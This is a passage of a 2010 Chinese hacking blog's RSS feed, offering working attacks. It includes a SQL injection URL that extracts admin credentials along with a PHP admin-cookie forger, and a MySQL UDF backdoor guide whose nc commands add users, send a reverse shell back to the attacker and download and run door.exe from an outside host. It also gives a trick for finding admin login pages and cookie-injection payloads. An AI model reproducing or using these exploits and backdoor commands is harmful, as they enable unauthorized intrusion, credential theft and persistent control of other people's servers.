href="http://www.nhs8.com/post/1591.html">某教育培训网ODAY</a>&nbsp;&nbsp;(2010-3-10 15:11:14)</p></ul>版权所有 神刀网 http://www.nhs8.com/ Q：46007728]]></description><category>网络安全与维护</category><comments>http://www.nhs8.com/post/1590.html#comment</comments><wfw:comment>http://www.nhs8.com/</wfw:comment><wfw:commentRss>http://www.nhs8.com/feed.asp?cmt=1590</wfw:commentRss><trackback:ping>http://www.nhs8.com/cmd.asp?act=tb&amp;id=1590&amp;key=d10b82c2</trackback:ping></item><item><title>搜一次CMS 0day EXP</title><author>ni10256@163.com (神刀)</author><link>http://www.nhs8.com/post/1589.html</link><pubDate>Tue, 09 Mar 2010 23:44:36 +0800</pubDate><guid>http://www.nhs8.com/post/1589.html</guid><description><![CDATA[<p>
<table cellspacing="0" cellpadding="0" width="100%" align="center" border="0">
    <tbody>
        <tr>
            <td height="6">&nbsp;</td>
        </tr>
        <tr>
            <td id="fontzoom" height="300">
            <p><font face="新宋体">将以下内容保存为html</font></p>
            <p><font face="新宋体">&lt;style type=&quot;text/css&quot;&gt;<br />
            &lt;!--<br />
            .STYLE1 { font-size:13px ; font-family: Arial, Helvetica, sans-serif}<br />
            --&gt;<br />
            from:www.3est.com<br />
            author:阿开<br />
            &lt;/style&gt;<br />
            &lt;span class=&quot;STYLE1&quot;&gt;示例：新建个窗口访问下面的地址，xxx换成目标网址，得到以：分割的数据，依次填入下面的框中!&lt;br&gt;<br />
            http://&lt;font color=red&gt;36dk.com&lt;/font&gt;/js/hits.php?type=2&amp;id=1 and 9=0 union select concat(S_id,0x3a,S_AdminUserName,0x3a,S_AdminPassWord,0x3a,S_Permission) from s_admin limit 0,1-- <br />
            &lt;form action=&quot;&quot; method=&quot;post&quot; enctype=&quot;multipart/form-data&quot; class=&quot;STYLE1&quot;&gt;<br />
            &lt;br&gt;&lt;br&gt;<br />
            S_AdminID:&lt;input type=&quot;text&quot; name=&quot;a&quot; /&gt;<br />
            S_AdminUserName:&lt;input type=&quot;text&quot; name=&quot;b&quot; /&gt;<br />
            S_AdminPassWord:&lt;input type=&quot;text&quot; name=&quot;c&quot; /&gt;<br />
            S_Permission:&lt;input type=&quot;text&quot; name=&quot;d&quot; /&gt;<br />
            &lt;br&gt;<br />
            &lt;input type=&quot;submit&quot; name=&quot;submit&quot; value=&quot;Submit&quot; /&gt;<br />
            &lt;/form&gt;&lt;/span&gt;<br />
            &lt;span class=&quot;STYLE1&quot;&gt;<br />
            &lt;?php <br />
            if(isset($_POST['a']))<br />
            {<br />
            echo &quot;cookie计算出来为：&lt;br&gt;&quot;;<br />
            echo &quot;S_AdminID=&quot;.$_POST['a'].&quot;;&quot;.&quot;S_AdminUserName=&quot;.$_POST['b'].&quot;;&quot;.&quot;S_AdminPassWord=&quot;.md5($_POST['c']).&quot;;&quot;.&quot;S_Permission=&quot;.$_POST['d'].&quot;;&quot;.&quot;S_Login=&quot;.md5($_POST['a'].$_POST['b'].md5($_POST['c']).$_POST['d']).&quot;;&quot;;<br />
            echo &quot;粘贴到老兵的浏览器中，访问/admin/index.php即可!&lt;br&gt;&quot;;<br />
            }<br />
            ?&gt;<br />
            &lt;/span&gt;</font></p>
            </td>
        </tr>
    </tbody>
</table>
</p><p>Copyright © 神刀网 http://www.nhs8.com/</p><p><a href="http://www.nhs8.com/post/1589.html" target="_blank">继续阅读《搜一次CMS 0day EXP》的全文内容...</a></p><p>分类: <a href="http://www.nhs8.com/catalog.asp?cate=24">网络安全与维护</a> | Tags: <a href="http://www.nhs8.com/catalog.asp?tags=%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E4%B8%8E%E7%BB%B4%E6%8A%A4">网络安全与维护</a>&nbsp;&nbsp; | <a href="http://www.nhs8.com/post/1589.html#comment" target="_blank">添加评论</a>(0)</p><h3>相关文章:</h3><ul><p><a  href="http://www.nhs8.com/post/1595.html">检测OA时代</a>&nbsp;&nbsp;(2010-3-10 16:13:6)</p><p><a  href="http://www.nhs8.com/post/1594.html">回忆社工小武&helen</a>&nbsp;&nbsp;(2010-3-10 16:3:37)</p><p><a  href="http://www.nhs8.com/post/1593.html">Zoomla!逐浪CMS3.2 0day</a>&nbsp;&nbsp;(2010-3-10 15:19:33)</p><p><a  href="http://www.nhs8.com/post/1592.html">PHPcms2008 0day</a>&nbsp;&nbsp;(2010-3-10 15:12:45)</p><p><a  href="http://www.nhs8.com/post/1591.html">某教育培训网ODAY</a>&nbsp;&nbsp;(2010-3-10 15:11:14)</p></ul>版权所有 神刀网 http://www.nhs8.com/ Q：46007728]]></description><category>网络安全与维护</category><comments>http://www.nhs8.com/post/1589.html#comment</comments><wfw:comment>http://www.nhs8.com/</wfw:comment><wfw:commentRss>http://www.nhs8.com/feed.asp?cmt=1589</wfw:commentRss><trackback:ping>http://www.nhs8.com/cmd.asp?act=tb&amp;id=1589&amp;key=dfcbf5ee</trackback:ping></item><item><title>Mysql Door</title><author>ni10256@163.com (神刀)</author><link>http://www.nhs8.com/post/1588.html</link><pubDate>Tue, 09 Mar 2010 22:35:40 +0800</pubDate><guid>http://www.nhs8.com/post/1588.html</guid><description><![CDATA[<div class="cnt" id="blog_text">
<p>Mysql BackDoor是一款针对PHP+Mysql服务器开发的后门,后门安装后为Mysql增加一个可以执行系统命令的&quot;state&quot;函数,并且随Mysql进程启动一个基于Dll的嗅探型后门,从而巧妙地实现了无端口,无进程,无服务的穿墙木马.程序在WINXP、WIN2003+MYSQL5.0.X下通过.</p>
<p>[安装]<br />
将Mysql.php传到PHP服务器上,依填上相应的Host、User、Password、DB后，点击&quot;自动安装Mysql BackDoor&quot;</p>
<p>&nbsp;</p>
<p>安装成功后,Mysql上便会增加一个&quot;state&quot;函数,同时利用Mysql进程运行一个基于嗅探的后门. 这个后门在Windows下拥有与Mysql一样的系统权限.</p>
<p>[使用state函数]<br />
State函数实际是一个和PHP的&rdquo;system()&rdquo;功能相同的函数,可以用来执行系统命令.在&rdquo;请输入SQL命令：&rdquo;处填写要执行的mysql语句,如&rdquo; select state(&quot;net user nohack /add&quot;)&rdquo;,点击&rdquo;执行SQL语句&rdquo;后,便会得到运行结果.</p>
<p>&nbsp;</p>
<p>[使用基于Sniff的后门]<br />
有了state函数,即使WebShell丢了,只要服务器上有SQL注入点,我们就能通过注入&quot;.php?id=1 and state('net user')&quot;的方法在服务器上执行命令.但是如果注入点都没有了呢?我们仍然调用基于Sniff的后门控制服务器.向服务器开放的任意端口发送以&quot;Mysql-&quot;开头的数据包,便能调用这个Sniff的后门,如:</p>
<p>1.运行系统命令: nc ip 80-&gt;回车-&gt;Mysql-cmd /c net user abc /add&gt;c:/log.txt! (注意:最后的&quot;!&quot;不可省略)<br />
2.让服务器反弹Shell到本机20082端口:先运行nc &ndash;lp 20082监听本机的20082端口,再nc ip 80-&gt;回车-&gt;Mysql-c--&gt;回车<br />
3.让服务器下载文件:nc ip 80-&gt;回车-&gt;Mysql-http://www.x.com/door.exe -c mydoor.exe! (注意:最后的&quot;!&quot;不可省略)</p>
<p>&nbsp;&nbsp;&nbsp; 除了发送&quot;Mysql-c-&rdquo;,其他的命令是没有回显的,但相应的命令已经在服务器上运行了.</p>
<p><br />
[卸载]<br />
在Mysql上运行&quot;drop function state&quot;便可卸载,但同时会造成mysql进程退出,重启后恢复正常。</p>
<p><span><img class="blogimg" src="http://hiphotos.baidu.com/hcbingdao/pic/item/45a8ef7b833569d82f73b30d.jpg" border="0" small="0" alt="" /><br />
<span><img class="blogimg" src="http://www.nhs8.com/upload/201003092236061878.jpg" border="0" small="0" alt="" /><br />
</span></span></p>
<p><span><img class="blogimg" src="http://www.nhs8.com/upload/201003092236077205.jpg" border="0" small="0" alt="" /><br />
<span><img class="blogimg" src="http://www.nhs8.com/upload/201003092236074686.jpg" border="0" small="0" alt="" /><br />
</span></span></p>
</div><p>Copyright © 神刀网 http://www.nhs8.com/</p><p><a href="http://www.nhs8.com/post/1588.html" target="_blank">继续阅读《Mysql Door》的全文内容...</a></p><p>分类: <a href="http://www.nhs8.com/catalog.asp?cate=24">网络安全与维护</a> | Tags: <a href="http://www.nhs8.com/catalog.asp?tags=%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E4%B8%8E%E7%BB%B4%E6%8A%A4">网络安全与维护</a>&nbsp;&nbsp; | <a href="http://www.nhs8.com/post/1588.html#comment" target="_blank">添加评论</a>(0)</p><h3>相关文章:</h3><ul><p><a  href="http://www.nhs8.com/post/1595.html">检测OA时代</a>&nbsp;&nbsp;(2010-3-10 16:13:6)</p><p><a  href="http://www.nhs8.com/post/1594.html">回忆社工小武&helen</a>&nbsp;&nbsp;(2010-3-10 16:3:37)</p><p><a  href="http://www.nhs8.com/post/1593.html">Zoomla!逐浪CMS3.2 0day</a>&nbsp;&nbsp;(2010-3-10 15:19:33)</p><p><a  href="http://www.nhs8.com/post/1592.html">PHPcms2008 0day</a>&nbsp;&nbsp;(2010-3-10 15:12:45)</p><p><a  href="http://www.nhs8.com/post/1591.html">某教育培训网ODAY</a>&nbsp;&nbsp;(2010-3-10 15:11:14)</p></ul>版权所有 神刀网 http://www.nhs8.com/ Q：46007728]]></description><category>网络安全与维护</category><comments>http://www.nhs8.com/post/1588.html#comment</comments><wfw:comment>http://www.nhs8.com/</wfw:comment><wfw:commentRss>http://www.nhs8.com/feed.asp?cmt=1588</wfw:commentRss><trackback:ping>http://www.nhs8.com/cmd.asp?act=tb&amp;id=1588&amp;key=34d6178a</trackback:ping></item><item><title>查找管理员后台的一个技巧 </title><author>ni10256@163.com (神刀)</author><link>http://www.nhs8.com/post/1587.html</link><pubDate>Tue, 09 Mar 2010 22:33:30 +0800</pubDate><guid>http://www.nhs8.com/post/1587.html</guid><description><![CDATA[<p>当我们知道一个网站的后台目录,却又无法确定后台登陆文件的时候,可以尝试在网址后面加上一个&quot;.&quot;<br />
比如http://www.xxx.com/admin,我们打开后显示的是Directory Listing Denied,意思也就是说找不到此目录的默认首页,<br />
那么我们可以把地址改成www.xxx.com./admin,注意com后面多了一个&quot;.&quot;,这样的话可以直接跳转到登陆页面.<br />
T00LS里说貌似只有在IIS下才可会出现这样的情况,我找了几个站试了一下,发现并不是所有IIS架设的站点都支持这种方法.<br />
拿本站举个例子,打开http://www.hacksb.cn/admin,同样显示的是Directory Listing Denied,不过在加上&quot;.&quot;的情况下,却显示Bad Request (Invalid Hostname).即域名未绑定主机状态.<br />
虽然不能通杀,不过相对来说也算是一个不错的技巧,大家如果遇到这种情况,可以尝试一下这个方法.</p><p>Copyright © 神刀网 http://www.nhs8.com/</p><p><a href="http://www.nhs8.com/post/1587.html" target="_blank">继续阅读《查找管理员后台的一个技巧 》的全文内容...</a></p><p>分类: <a href="http://www.nhs8.com/catalog.asp?cate=24">网络安全与维护</a> | Tags: <a href="http://www.nhs8.com/catalog.asp?tags=%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E4%B8%8E%E7%BB%B4%E6%8A%A4">网络安全与维护</a>&nbsp;&nbsp; | <a href="http://www.nhs8.com/post/1587.html#comment" target="_blank">添加评论</a>(0)</p><h3>相关文章:</h3><ul><p><a  href="http://www.nhs8.com/post/1595.html">检测OA时代</a>&nbsp;&nbsp;(2010-3-10 16:13:6)</p><p><a  href="http://www.nhs8.com/post/1594.html">回忆社工小武&helen</a>&nbsp;&nbsp;(2010-3-10 16:3:37)</p><p><a  href="http://www.nhs8.com/post/1593.html">Zoomla!逐浪CMS3.2 0day</a>&nbsp;&nbsp;(2010-3-10 15:19:33)</p><p><a  href="http://www.nhs8.com/post/1592.html">PHPcms2008 0day</a>&nbsp;&nbsp;(2010-3-10 15:12:45)</p><p><a  href="http://www.nhs8.com/post/1591.html">某教育培训网ODAY</a>&nbsp;&nbsp;(2010-3-10 15:11:14)</p></ul>版权所有 神刀网 http://www.nhs8.com/ Q：46007728]]></description><category>网络安全与维护</category><comments>http://www.nhs8.com/post/1587.html#comment</comments><wfw:comment>http://www.nhs8.com/</wfw:comment><wfw:commentRss>http://www.nhs8.com/feed.asp?cmt=1587</wfw:commentRss><trackback:ping>http://www.nhs8.com/cmd.asp?act=tb&amp;id=1587&amp;key=3a8e1c33</trackback:ping></item><item><title>千博系统cookie注入</title><author>ni10256@163.com (神刀)</author><link>http://www.nhs8.com/post/1586.html</link><pubDate>Tue, 09 Mar 2010 22:28:53 +0800</pubDate><guid>http://www.nhs8.com/post/1586.html</guid><description><![CDATA[<p>多少版本，未知</p>
<p>javascript:alert(document.cookie=&quot;keyword=&quot;+escape(&quot;千博%'and 1=1 and '%'='&quot;))</p>
<p>javascript:alert(document.cookie=&quot;keyword=&quot;+escape(&quot;千博%'and 1=21 and '%'='&quot;))</p><p>Copyright © 神刀网 http://www.nhs8.com/</p><p><a href="http://www.nhs8.com/post/1586.html" target="_blank">继续阅读《千博系统cookie注入》的全文内容...</a></p><p>分类: <a href="http://www.nhs8.com/catalog.asp?cate=24">网络安全与维护</a> | Tags: <a href="http://www.nhs8.com/catalog.asp?tags=%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E4%B8%8E%E7%BB%B4%E6%8A%A4">网络安全与维护</a>&nbsp;&nbsp; | <a href="http://www.nhs8.com/post/1586.html#comment" target="_blank">添加评论</a>(0)</p><h3>相关文章:</h3><ul><p><a  href="http://www.nhs8.com/post/1595.html">检测OA时代</a>&nbsp;&nbsp;(2010-3-10 16:13:6)</p><p><a  href="http://www.nhs8.com/post/1594.html">回忆社工小武&helen</a>&nbsp;&nbsp;(2010-3-10 16:3:37)</p><p><a  href="http://www.nhs8.com/post/1593.html">Zoomla!逐浪CMS3.2 0day</a>&nbsp;&nbsp;(2010-3-10 15:19:33)</p><p><a  href="http://www.nhs8.com/post/1592.html">PHPcms2008 0day</a>&nbsp;&nbsp;(2010-3-10 15:12:45)</p><p><a  href="http://www.nhs8.com/post/1591.html">某教育培训网ODAY</a>&nbsp;&nbsp;(2010-3-10 15:11:14)</p></ul>版权所有 神刀网 http://www.nhs8.com/ Q：46007728]]></description><category>网络安全与维护</category><comments>http://www.nhs8.com/post/1586.html#comment</comments><wfw:comment>http://www.nhs8.com/</wfw:comment><wfw:commentRss>http://www.nhs8.com/feed.asp?cmt=1586</wfw:commentRss><trackback:ping>http://www.nhs8.com/cmd.asp?act=tb&amp;id=1586&amp;key=8a8967ba</trackback:ping></item></channel></rss>
